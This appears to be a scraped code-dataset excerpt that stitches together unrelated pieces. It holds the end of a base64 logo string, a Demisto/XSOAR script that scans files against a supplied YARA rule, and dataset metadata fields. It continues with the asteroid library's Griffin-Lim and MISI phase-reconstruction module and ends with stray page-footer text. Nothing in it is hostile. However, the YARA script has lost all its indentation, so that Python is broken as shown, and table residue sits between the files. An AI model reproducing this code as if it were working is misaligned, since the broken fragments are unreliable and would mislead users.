btQTmSedX6lqcns+5XxZdiLLzOAJhk2nWnPPEOzN282vD8vQcwN0hbQJknsBgdpLMNodxKSnkMTu5gOp7tY8MEHQsf4+Y036Obly1bds4xwqobGZgU7oaolw2j54T5DGGAITSQgtBoE50te2NAglCv5d6VK9ftXX1l5z4dIzgS7oLZFNSOLC9azzeqOj0o6TrlmtG1aGZrRpuCVaMrTmviSySSdKC7m/z+sbKv17MyGU7RqleGT3+jqoraVK9UBh5K4xC/vip6eu/7lXJ9vvBAjLnzAQ/d56CLkjUF3oQlevKTo+yLxWj2jSWcyGZZSvfrD5s1ChsNJvn567TWZhqOnPv2ex8L5JgLQxCYYMh2eqsC9VSJ07duXybQW+8hb407ewzsOTRxrOtyOs+Cjj9TMgEbhXMlsOhmEDWedh3SOakYLoInzTIdz34iMOubuca5W2WBdK65nbvSQ1rtIXgMmgCbWmE7BU08JL7TXqVTLLOwen4hGDxnPeHSH6QzQxBmmw2uXz62vFzoZ5+KxYNSxEeNZ6hHhuWs1BOOBJo4wneL162myQFY/rlZF3nzTzsIvJTmDtvCQA2giajoc5YhMc2AuvfuunapVdyOqGc8ujzzk/AUJ432HJrY0Hc4OOCkQMHwSzrFzucEx05XqyBvJqga0r+s6QgMzNLGb6XDVSoRf3n7bDr1VRsLdOVrk42YDatLuk++3EQYETcxmwsE2U5ctUxOmi0Q5sSNHnFo+US3yGaecbg9dD0o+19OU2cl74RRz5SkiFSQvraaVet0Pp1WdXanJhKZTVFkpdEaTMwFmogCjKQ+E7Gpd0Cb3OeDS6K7O4VUvV2gyYfWqMBQSOoGDoxwAgNWmkxMICK9tNdLVhVJOjwIUAfC86YhWrdQTCOTa8RBcX1+LYgCeNx3RqhWDxfPSgvMul6MYgOdNR8aqnSWbNqGU7x/h8ACmGgnHCqM4geNNRwac6GvuO+9QdgGaLFLgrs9aGstxK8NwoihS4BT8VpyEBxcGqqrUZYiHo7ffj/EUGdfPn1eTs1tEHY1l0ncTiHKAO0yHk20VLF8uJ6TKy1PXxbrb2lh8jl8PHEBPl3E+QREAV1SvYs3WjLHhfMmJwUGoYYw2RDrANaYzdK5dXbHBbPqPH89Egna3sBVFAFxjOmPRTrPpF8FVK2DYcBDlAHeZjtlzp661t9PgyZNQQj+cZhXJ1oH7TGe4o4N6Dx407QJ6Ghqggj44suG0B40oCuBK02Eib71FI93dplzAQEsLVEiPKI0ldwoRxuUAt5tOIhajc1VVdLO3V+rJhyMRdJOn4cs0lgeGoxus1Am8YTrj1ayzq1fT1dZWaSePf/cdFEjPbOpQHMBzpsNwVHJ2zRrq3LZNSld6HA3IdzMajmY2ppgNVm0AriJ1RDKPBPx14rpWQu3R+u2LL7JmrFs3q+i55/6Uv2jRzNySkul6Tnz9woXu/mPHuD9+VOL9xNL4N1GyRzfzP1KMpo3+NyshAK7Fl0wm6URxsatuakVPD5QFwKb8R4ABAIVBfi7Jn7kUAAAAAElFTkSuQmCC" # noqa
def main():
entries = list()
args = demisto.args()
entryIDs = argToList(args.get('entryIDs'))
fileInfos = list()
for item in entryIDs:
res = demisto.executeCommand("getFilePath", {"id": item})
if is_error(res):
return_error(get_error(res))
if type(res[0]['Contents']) == dict:
fileInfo = {
"name": res[0]['Contents']['name'],
"id": res[0]['Contents']['ID'],
"path": res[0]['Contents']['path'],
"entryID": item
}
fileInfos.append(fileInfo)
if len(fileInfos) < 1:
return_error('No files were found for scanning, please check the entry IDs')
yaraRuleRaw = args.get('yaraRule')
for fileInfo in fileInfos:
with open(fileInfo['path'], 'rb') as fp:
thisMatch = {
"Filename": fileInfo['name'],
"entryID": fileInfo['entryID'],
"fileID": fileInfo['id'],
"HasMatch": False,
"HasError": False,
"MatchCount": 0,
"Matches": list(),
"Errors": list()
}
try:
cRule = yara.compile(source=yaraRuleRaw)
except Exception as err:
thisMatch['HasError'] = True
thisMatch['Errors'].append(str(err))
entries.append(thisMatch)
continue
try:
matches = cRule.match(data=fp.read())
except Exception as err:
thisMatch['HasError'] = True
thisMatch['Errors'].append(str(err))
entries.append(thisMatch)
continue
if len(matches) > 0:
thisMatch['HasMatch'] = True
else:
thisMatch['HasMatch'] = False
for match in matches:
matchData = dict()
matchData['RuleName'] = match.rule
matchData['Meta'] = match.meta
matchData['Strings'] = str(match.strings)
matchData['Tags'] = match.tags
matchData['Namespace'] = match.namespace
thisMatch['Matches'].append(matchData)
thisMatch['MatchCount'] += 1
entries.append(thisMatch)
md = "\n\n{}".format(
yaraLogo,
tableToMarkdown('Yara Scan Results:', entries, ['Filename', 'entryID', 'HasMatch', 'HasError', 'MatchCount', 'Matches']))
demisto.results({
'Type': entryTypes['note'],
'Contents': entries,
'ContentsFormat': formats['json'],
'HumanReadable': md,
'ReadableContentsFormat': formats['markdown'],
'EntryContext': {'Yara(val.entryID && val.entryID==obj.entryID)': entries}
})
if __name__ in ['__main__', 'builtin', 'builtins']:
main()
| 78.290323 | 4,185 | 0.778739 |
ed43b1917ff7c88db3c61fe561a0b799eb6154d1
| 7,338 |
py
|
Python
|
asteroid/filterbanks/griffin_lim.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | 1 |
2020-12-18T02:42:23.000Z
|
2020-12-18T02:42:23.000Z
|
asteroid/filterbanks/griffin_lim.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | null | null | null |
asteroid/filterbanks/griffin_lim.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | null | null | null |
import torch
import math
from . import Encoder, Decoder, STFTFB # noqa
from .stft_fb import perfect_synthesis_window
from . import transforms
from ..dsp.consistency import mixture_consistency
def griffin_lim(mag_specgram, stft_enc, angles=None, istft_dec=None, n_iter=6, momentum=0.9):
"""Estimates matching phase from magnitude spectogram using the
'fast' Griffin Lim algorithm [1].
Args:
mag_specgram (torch.Tensor): (any, dim, ension, freq, frames) as
returned by `Encoder(STFTFB)`, the magnitude spectrogram to be
inverted.
stft_enc (Encoder[STFTFB]): The `Encoder(STFTFB())` object that was
used to compute the input `mag_spec`.
angles (None or Tensor): Angles to use to initialize the algorithm.
If None (default), angles are init with uniform ditribution.
istft_dec (None or Decoder[STFTFB]): Optional Decoder to use to get
back to the time domain. If None (default), a perfect
reconstruction Decoder is built from `stft_enc`.
n_iter (int): Number of griffin-lim iterations to run.
momentum (float): The momentum of fast Griffin-Lim. Original
Griffin-Lim is obtained for momentum=0.
Returns:
torch.Tensor: estimated waveforms of shape (any, dim, ension, time).
Examples
>>> stft = Encoder(STFTFB(n_filters=256, kernel_size=256, stride=128))
>>> wav = torch.randn(2, 1, 8000)
>>> spec = stft(wav)
>>> masked_spec = spec * torch.sigmoid(torch.randn_like(spec))
>>> mag = transforms.take_mag(masked_spec, -2)
>>> est_wav = griffin_lim(mag, stft, n_iter=32)
References
- [1] Perraudin et al. "A fast Griffin-Lim algorithm," WASPAA 2013.
- [2] D. W. Griffin and J. S. Lim: "Signal estimation from modified
short-time Fourier transform," ASSP 1984.
"""
# We can create perfect iSTFT from STFT Encoder
if istft_dec is None:
# Compute window for perfect resynthesis
syn_win = perfect_synthesis_window(stft_enc.filterbank.window, stft_enc.stride)
istft_dec = Decoder(STFTFB(**stft_enc.get_config(), window=syn_win))
# If no intitial phase is provided initialize uniformly
if angles is None:
angles = 2 * math.pi * torch.rand_like(mag_specgram, device=mag_specgram.device)
else:
angles = angles.view(*mag_specgram.shape)
# Initialize rebuilt (useful to use momentum)
rebuilt = 0.0
for _ in range(n_iter):
prev_built = rebuilt
# Go to the time domain
complex_specgram = transforms.from_mag_and_phase(mag_specgram, angles)
waveform = istft_dec(complex_specgram)
# And back to TF domain
rebuilt = stft_enc(waveform)
# Update phase estimates (with momentum)
diff = rebuilt - momentum / (1 + momentum) * prev_built
angles = transforms.angle(diff)
final_complex_spec = transforms.from_mag_and_phase(mag_specgram, angles)
return istft_dec(final_complex_spec)
def misi(
mixture_wav,
mag_specgrams,
stft_enc,
angles=None,
istft_dec=None,
n_iter=6,
momentum=0.0,
src_weights=None,
dim=1,
):
"""Jointly estimates matching phase from magnitude spectograms using the
Multiple Input Spectrogram Inversion (MISI) algorithm [1].
Args:
mixture_wav (torch.Tensor): (batch, time)
mag_specgrams (torch.Tensor): (batch, n_src, freq, frames) as
returned by `Encoder(STFTFB)`, the magnitude spectrograms to be
jointly inverted using MISI (modified or not).
stft_enc (Encoder[STFTFB]): The `Encoder(STFTFB())` object that was
used to compute the input `mag_spec`.
angles (None or Tensor): Angles to use to initialize the algorithm.
If None (default), angles are init with uniform ditribution.
istft_dec (None or Decoder[STFTFB]): Optional Decoder to use to get
back to the time domain. If None (default), a perfect
reconstruction Decoder is built from `stft_enc`.
n_iter (int): Number of MISI iterations to run.
momentum (float): Momentum on updates (this argument comes from
GriffinLim). Defaults to 0 as it was never proposed anywhere.
src_weights (None or torch.Tensor): Consistency weight for each source.
Shape needs to be broadcastable to `istft_dec(mag_specgrams)`.
We make sure that the weights sum up to 1 along dim `dim`.
If `src_weights` is None, compute them based on relative power.
dim (int): Axis which contains the sources in `mag_specgrams`.
Used for consistency constraint.
Returns:
torch.Tensor: estimated waveforms of shape (batch, n_src, time).
Examples
>>> stft = Encoder(STFTFB(n_filters=256, kernel_size=256, stride=128))
>>> wav = torch.randn(2, 3, 8000)
>>> specs = stft(wav)
>>> masked_specs = specs * torch.sigmoid(torch.randn_like(specs))
>>> mag = transforms.take_mag(masked_specs, -2)
>>> est_wav = misi(wav.sum(1), mag, stft, n_iter=32)
References
[1] Gunawan and Sen, "Iterative Phase Estimation for the Synthesis of
Separated Sources From Single-Channel Mixtures," in IEEE Signal
Processing Letters, 2010.
[2] Wang, LeRoux et al. “End-to-End Speech Separation with Unfolded
Iterative Phase Reconstruction.” Interspeech 2018 (2018)
"""
# We can create perfect iSTFT from STFT Encoder
if istft_dec is None:
# Compute window for perfect resynthesis
syn_win = perfect_synthesis_window(stft_enc.filterbank.window, stft_enc.stride)
istft_dec = Decoder(STFTFB(**stft_enc.get_config(), window=syn_win))
# If no intitial phase is provided initialize uniformly
if angles is None:
angles = 2 * math.pi * torch.rand_like(mag_specgrams, device=mag_specgrams.device)
# wav_dim is used in mixture_consistency.
# Transform spec src dim to wav src dim for positive and negative dim
wav_dim = dim if dim >= 0 else dim + 1
# We forward/backward the mixture through STFT to have matching shapes
# with the input spectrograms as well as account for potential modulations
# if the window were not chosen to enable perfect reconstruction.
mixture_wav = istft_dec(stft_enc(mixture_wav))
# Initialize rebuilt (useful to use momentum)
rebuilt = 0.0
for _ in range(n_iter):
prev_built = rebuilt
# Go to the time domain
complex_specgram = transforms.from_mag_and_phase(mag_specgrams, angles)
wavs = istft_dec(complex_specgram)
# Make wavs sum up to the mixture
consistent_wavs = mixture_consistency(
mixture_wav, wavs, src_weights=src_weights, dim=wav_dim
)
# Back to TF domain
rebuilt = stft_enc(consistent_wavs)
# Update phase estimates (with momentum). Keep the momentum here
# in case. Was shown useful in GF, might be here. We'll see.
diff = rebuilt - momentum / (1 + momentum) * prev_built
angles = transforms.angle(diff)
# Final source estimates
final_complex_spec = transforms.from_mag_and_phase(mag_specgrams, angles)
return istft_dec(final_complex_spec)
| 43.94012 | 93 | 0.670755 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.